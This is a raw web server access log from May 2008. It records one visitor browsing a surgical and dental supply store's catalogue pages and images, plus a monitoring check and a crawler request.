211.23.228.138 - - [22/May/2008:01:14:44 -0400] "GET /images/login.gif HTTP/1.1" 200 166 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:44 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:45 -0400] "GET /images/search.gif HTTP/1.1" 200 614 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:45 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:45 -0400] "GET /images/sale_promo-icon.gif HTTP/1.1" 200 402 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:45 -0400] "GET /images/store_anesth_section.jpg HTTP/1.1" 200 10123 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:46 -0400] "GET /images/store_bone_section2.jpg HTTP/1.1" 200 21458 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:46 -0400] "GET /images/store_cardiac_section.jpg HTTP/1.1" 200 25730 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:47 -0400] "GET /images/store_implant_section.jpg HTTP/1.1" 200 8001 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:48 -0400] "GET /images/store_gauze_section.jpg HTTP/1.1" 200 24119 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:48 -0400] "GET /images/store_handpc_section.jpg HTTP/1.1" 200 23958 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:49 -0400] "GET /images/store_infection_section.jpg HTTP/1.1" 200 25264 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:50 -0400] "GET /images/store_instr_section.jpg HTTP/1.1" 200 26432 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:51 -0400] "GET /images/store_irrigate_section.gif HTTP/1.1" 200 10336 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:51 -0400] "GET /images/store_iv_admin_section.jpg HTTP/1.1" 200 9115 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:52 -0400] "GET /images/store_assess_section.jpg HTTP/1.1" 200 10059 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:52 -0400] "GET /images/store_pharma_section.jpg HTTP/1.1" 200 7953 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:53 -0400] "GET /images/store_sterile_section.jpg HTTP/1.1" 200 9274 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:53 -0400] "GET /images/store_blades_section.jpg HTTP/1.1" 200 24174 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:53 -0400] "GET /images/store_burs_section.jpg HTTP/1.1" 200 10892 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:54 -0400] "GET /images/store_saws_section.jpg HTTP/1.1" 200 10028 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:55 -0400] "GET /images/store_sutures_section.jpg HTTP/1.1" 200 28375 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:55 -0400] "GET /images/store_syringe_section.jpg HTTP/1.1" 200 9321 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:56 -0400] "GET /images/store_xray_section.jpg HTTP/1.1" 200 8861 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:57 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:14:57 -0400] "GET /images/over-store_infection_section.jpg HTTP/1.1" 200 8680 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:15:06 -0400] "GET /images/over-store_handpc_section.jpg HTTP/1.1" 200 8331 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:15:08 -0400] "GET /images/over-store_anesth_section.jpg HTTP/1.1" 200 9173 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:15:10 -0400] "GET /images/nav04_about_over.jpg HTTP/1.1" 200 1472 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:15:10 -0400] "GET /images/nav04_about_over.jpg HTTP/1.1" 200 1472 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:15:11 -0400] "GET /images/ace_logo_top_over.jpg HTTP/1.1" 200 2616 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:15:29 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 38212 "http://www.acesurgical.com/home_May08.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:15:34 -0400] "GET /images/over-store_assess_section.jpg HTTP/1.1" 200 9043 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:15:35 -0400] "GET /images/over-store_saws_section.jpg HTTP/1.1" 200 9138 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
209.59.12.99 - - [22/May/2008:01:15:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.23.228.138 - - [22/May/2008:01:15:52 -0400] "GET /images/over-store_burs_section.jpg HTTP/1.1" 200 9926 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:15:53 -0400] "GET /images/over-store_burs_section.jpg HTTP/1.1" 200 9926 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:15:53 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG HTTP/1.1" 200 38730 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:15:55 -0400] "GET /images/nav04_shop_off.jpg HTTP/1.1" 200 1390 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:15:55 -0400] "GET /images/index3_imp_air.jpg HTTP/1.1" 200 1763 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:15:56 -0400] "GET /images/index3_crestonome.jpg HTTP/1.1" 200 1509 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:15:56 -0400] "GET /images/index3_cylinder.jpg HTTP/1.1" 200 1390 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:15:56 -0400] "GET /images/index3_kirschner.jpg HTTP/1.1" 200 2017 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:15:56 -0400] "GET /images/index3_lindemann.jpg HTTP/1.1" 200 3788 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:15:57 -0400] "GET /images/index3.ovalbone.jpg HTTP/1.1" 200 2959 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:15:57 -0400] "GET /images/index3.roundburs.jpg HTTP/1.1" 200 3260 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:15:58 -0400] "GET /images/index3_sinus.jpg HTTP/1.1" 200 1410 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:15:58 -0400] "GET /images/index3_whiteburs.jpg HTTP/1.1" 200 2734 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:15:58 -0400] "GET /images/index3.taperburs HTTP/1.1" 404 221 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:15:59 -0400] "GET /images/index3_trephine.jpg HTTP/1.1" 200 5563 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:16:00 -0400] "GET /images/over-index3_sinus.jpg HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
66.249.70.33 - - [22/May/2008:01:16:11 -0400] "GET /logs/access_log.Q108021800 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.23.228.138 - - [22/May/2008:01:16:12 -0400] "GET /images/over-index3_imp_air.jpg HTTP/1.1" 404 228 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:16:15 -0400] "GET /images/over-store_anesth_section.jpg HTTP/1.1" 200 9173 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:16:16 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG HTTP/1.1" 200 38202 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:16:17 -0400] "GET /images/over-store_instr_section.jpg HTTP/1.1" 200 9238 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:16:18 -0400] "GET /images/index4_accessories.jpg HTTP/1.1" 200 4426 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:16:18 -0400] "GET /images/index4_bur.jpg HTTP/1.1" 200 2159 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:16:19 -0400] "GET /images/index4_halltype1.jpg HTTP/1.1" 200 1909 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:16:19 -0400] "GET /images/index4_hose.jpg HTTP/1.1" 200 3567 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:16:20 -0400] "GET /images/index4_conanglehp.jpg HTTP/1.1" 200 3196 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:16:20 -0400] "GET /images/index4_elcomed.jpg HTTP/1.1" 200 3273 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:16:21 -0400] "GET /images/index4_oils&lub.jpg HTTP/1.1" 200 3657 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:16:21 -0400] "GET /images/index4_straigthand.jpg HTTP/1.1" 200 3006 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:16:22 -0400] "GET /images/index4_surgidrill.jpg HTTP/1.1" 200 2040 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:16:23 -0400] "GET /images/index4_impairhand.jpg HTTP/1.1" 200 1820 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:16:24 -0400] "GET /images/over-index4_conanglehp.jpg HTTP/1.1" 200 2353 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:16:24 -0400] "GET /images/over-index4_impairhand.jpg HTTP/1.1" 200 1464 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:16:25 -0400] "GET /images/over-index4_straigthand.jpg HTTP/1.1" 200 2203 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:16:30 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631972187500A860061+M37+ENG HTTP/1.1" 200 45332 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:16:32 -0400] "GET /images/over-index4_conanglehp.jpg HTTP/1.1" 200 2353 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:16:33 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631972187500A860061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:16:33 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631972187500A860061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
211.23.228.138 - - [22/May/2008:01:17:17 -0400] "GET /images/over-index4_elcomed.jpg HTTP/1.1" 200 2334 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F1C631D7B78F5007700061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0)"
